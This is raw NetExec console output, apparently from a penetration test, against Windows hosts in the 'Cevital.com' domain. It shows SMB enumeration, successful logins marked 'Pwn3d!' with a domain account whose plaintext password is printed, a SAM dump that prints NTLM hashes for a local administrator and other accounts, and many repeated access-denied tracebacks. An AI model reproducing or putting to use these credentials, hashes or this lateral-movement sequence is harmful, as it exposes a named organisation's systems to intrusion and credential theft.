SMB 10.34.174.9 445 OXODT02090006 [*] Windows 11 Build 22621 x64
(name:OXODT02090006) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.11 445 OXODT020005 [*] Windows 11 Build 22621 x64
(name:OXODT020005) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.13 445 OXOLT020053 [*] Windows 11 Build 22621 x64
(name:OXOLT020053) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.18 445 OXOLT020060 [*] Windows 11 Build 22621 x64
(name:OXOLT020060) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.26 445 OXODT020061 [*] Windows 11 Build 22621 x64
(name:OXODT020061) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.17 445 OXOLT020032 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020032) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.27 445 OXOLT020026 [*] Windows 11 Build 22621 x64
(name:OXOLT020026) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.28 445 OXODT020057 [*] Windows 11 Build 22621 x64
(name:OXODT020057) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.42 445 OXOLT020087 [*] Windows 11 Build 22621 x64
(name:OXOLT020087) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.30 445 OXODT02030002 [*] Windows 11 Build 22621 x64
(name:OXODT02030002) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.36 445 OXODT020066 [*] Windows 11 Build 22621 x64
(name:OXODT020066) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.23 445 OXOLT020064 [*] Windows 11 Build 22621 x64
(name:OXOLT020064) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.41 445 OXOLT020014 [*] Windows 11 Build 22621 x64
(name:OXOLT020014) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.37 445 OXOLT020036 [*] Windows 11 Build 22621 x64
(name:OXOLT020036) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.38 445 OXODT020119 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020119) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.174.60 445 OXODT02070008 [*] Windows 11 Build 22621 x64
(name:OXODT02070008) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.52 445 OXODT02010002 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02010002) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.174.79 445 OXODT020073 [*] Windows 11 Build 22621 x64
(name:OXODT020073) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.40 445 OXODT02060007 [*] Windows 11 Build 22621 x64
(name:OXODT02060007) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.68 445 OXODT02050001 [*] Windows 11 Build 22621 x64
(name:OXODT02050001) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.63 445 OXODT020072 [*] Windows 11 Build 22621 x64
(name:OXODT020072) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.69 445 OXOLT020055 [*] Windows 11 Build 22621 x64
(name:OXOLT020055) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.70 445 OXOLT020090 [*] Windows 11 Build 22621 x64
(name:OXOLT020090) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.58 445 OXODT02020002 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02020002) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.174.51 445 OXODT02040013 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02040013) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.174.61 445 OXOLT020067 [*] Windows 11 Build 22621 x64
(name:OXOLT020067) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.9 445 OXODT02090006 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.86 445 OXODT020017 [*] Windows 11 Build 22621 x64
(name:OXODT020017) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.174.11 445 OXODT020005 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.13 445 OXOLT020053 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.18 445 OXOLT020060 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.26 445 OXODT020061 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.11 445 OXODT020005 [*] Dumping SAM hashes
SMB 10.34.174.17 445 OXOLT020032 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:27] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.11 445 OXODT020005


rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.174.11 445 OXODT020005
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.174.11 445 OXODT020005
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
[03:25:28] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.27 445 OXOLT020026 [-] Connection Error: The


NETBIOS connection with the remote host timed out.
[03:25:29] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.11 445 OXODT020005


WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.174.11 445 OXODT020005 [+] Added 4 SAM hashes to the
database
[03:25:30] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.28 445 OXODT020057 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.42 445 OXOLT020087 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.30 445 OXODT02030002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.36 445 OXODT020066 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:34] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.23 445 OXOLT020064 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

[03:25:35] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.41 445 OXOLT020014 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.37 445 OXOLT020036 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:36] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

